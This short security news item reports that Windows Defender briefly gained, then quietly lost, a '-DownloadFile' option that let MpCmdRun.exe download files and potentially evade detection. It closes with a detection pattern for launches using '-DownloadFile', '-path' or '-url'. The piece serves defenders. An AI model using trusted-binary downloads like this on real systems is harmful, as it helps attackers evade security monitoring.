Earlier this month, Microsoft met backlash for adding a new “-DownloadFile” command line option to Windows Defender, enabling anyone with some level of access to the system to download files using a trusted application to potentially evade detection. Almost as quickly as it appeared without warning, as of version 4.18.2009.2-0 this feature has been quietly removed. Attempting to use the “-DownloadFile” option will once again return the message “CmdTool: Invalid command line argument.”
Defenders can still watch out for attempts to use this option by monitoring process execution events where “MpCmdRun.exe” is being launched with the “-DownloadFile”, “-path” or “-url” arguments. With the feature being removed quickly and quietly, chances are high that any instance of “MpCmdRun.exe” being launched with those three arguments will not be legitimate.